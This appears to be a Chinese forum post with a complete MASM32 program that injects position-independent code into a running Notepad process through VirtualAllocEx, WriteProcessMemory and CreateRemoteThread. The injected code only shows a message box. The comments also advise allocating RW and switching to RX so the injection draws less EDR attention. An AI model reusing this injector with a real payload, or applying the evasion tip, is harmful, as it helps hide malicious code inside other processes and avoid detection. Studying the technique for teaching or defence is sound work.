一个简单的注入示例(VirtualAllocEx + WriteProcessMemory + CreateRemoteThread);至于通过 hook 来实现,我没听说过。
先打开记事本(Notepad),再运行下面的程序;它会在记事本进程里弹出一个消息框。
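.386
.model flat, stdcall
option casemap:none

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib

.data
    szClass         db 'Notepad',0

.data?
    hProcess        dd ?
    lpRemoteBuf     dd ?        ; base of the buffer allocated inside the target
    hThread         dd ?
    Pid             dd ?
    Written         dd ?
    lpMessageBox    dd ?        ; address of MessageBoxA resolved in *this* process

.const
    szMessageBox    db 'MessageBoxA',0
    szUser32dll     db 'User32.dll',0

.code
; ---------------------------------------------------------------------------
; Payload image. Everything between REMOTE_CODE_START and REMOTE_CODE_END is
; copied as one contiguous blob into the target: a pointer slot, two strings
; and the position-independent code that uses them. The payload must not
; reference any data outside this range, because only this range exists in
; the target process.
; ---------------------------------------------------------------------------
REMOTE_CODE_START:
_lpMessageBox   dd ?                ; first dword of the image; patched by the injector
_cap            db 'i am coming',0
_text           db 'haha',0

; Thread start routine executed inside the target.
; Computes its own load delta in EBX (runtime address minus link-time
; address) and rebases every data reference through it, so the code runs
; correctly at whatever address VirtualAllocEx returned.
Shellcode proc
    call    @F
@@:
    pop     ebx
    sub     ebx, offset @B          ; ebx = remote address - local address
    ; MessageBoxA(NULL, _text, _cap, MB_OK); stdcall, pushed right to left
    push    MB_OK
    mov     eax, offset _cap
    add     eax, ebx
    push    eax
    mov     eax, offset _text
    add     eax, ebx
    push    eax
    push    NULL
    call    dword ptr [ebx + _lpMessageBox]
    ret
Shellcode endp
REMOTE_CODE_END:

; ---------------------------------------------------------------------------
; Injector entry point: locate Notepad, copy the payload into it and start a
; remote thread on it. Every API result is checked; the first failure exits
; with code 1 instead of passing a NULL handle or address to the next call
; (the original continued unconditionally).
; ---------------------------------------------------------------------------
start:
    ; Resolve MessageBoxA locally. The payload reuses this address, which
    ; assumes user32.dll is mapped at the same base in the target process
    ; (true for system DLLs within one logon session; confirm before
    ; injecting into anything other than a same-session process).
    invoke  GetModuleHandle, addr szUser32dll
    .if eax == NULL
        jmp     fail
    .endif
    invoke  GetProcAddress, eax, addr szMessageBox
    .if eax == NULL
        jmp     fail
    .endif
    mov     lpMessageBox, eax

    ; FindWindow returns NULL when no Notepad window exists.
    invoke  FindWindow, addr szClass, NULL
    .if eax == NULL
        jmp     fail
    .endif
    invoke  GetWindowThreadProcessId, eax, addr Pid
    .if eax == 0
        jmp     fail
    .endif

    ; Access mask as documented for CreateRemoteThread: PROCESS_CREATE_THREAD,
    ; PROCESS_QUERY_INFORMATION, PROCESS_VM_OPERATION, PROCESS_VM_WRITE and
    ; PROCESS_VM_READ. OpenProcess returns NULL when the target runs at a
    ; higher integrity level or under another user.
    invoke  OpenProcess, PROCESS_CREATE_THREAD or PROCESS_QUERY_INFORMATION or \
                         PROCESS_VM_OPERATION or PROCESS_VM_WRITE or PROCESS_VM_READ, \
                         FALSE, Pid
    .if eax == NULL
        jmp     fail
    .endif
    mov     hProcess, eax

    ; One RWX region holds both data and code. NOTE: RWX allocations in a
    ; foreign process are a common EDR detection signal; allocating RW and
    ; switching to RX with VirtualProtectEx after the write is the less
    ; conspicuous shape.
    invoke  VirtualAllocEx, hProcess, NULL, REMOTE_CODE_END - REMOTE_CODE_START, \
                            MEM_COMMIT, PAGE_EXECUTE_READWRITE
    .if eax == NULL
        jmp     fail_close
    .endif
    mov     lpRemoteBuf, eax

    ; Copy the whole image, then patch its first dword (_lpMessageBox sits
    ; exactly at REMOTE_CODE_START) with the resolved MessageBoxA address.
    invoke  WriteProcessMemory, hProcess, lpRemoteBuf, offset REMOTE_CODE_START, \
                                REMOTE_CODE_END - REMOTE_CODE_START, addr Written
    .if eax == 0
        jmp     fail_close
    .endif
    invoke  WriteProcessMemory, hProcess, lpRemoteBuf, offset lpMessageBox, \
                                sizeof dword, addr Written
    .if eax == 0
        jmp     fail_close
    .endif

    ; Remote start address = remote base + offset of Shellcode inside the image.
    mov     eax, lpRemoteBuf
    add     eax, Shellcode - REMOTE_CODE_START
    invoke  CreateRemoteThread, hProcess, NULL, 0, eax, NULL, 0, NULL
    .if eax == NULL
        jmp     fail_close
    .endif
    mov     hThread, eax

    ; We do not wait for the remote thread. The buffer stays mapped in the
    ; target and is only reclaimed when Notepad exits.
    invoke  CloseHandle, hThread
    invoke  CloseHandle, hProcess
    invoke  ExitProcess, 0

fail_close:
    invoke  CloseHandle, hProcess
fail:
    invoke  ExitProcess, 1
end start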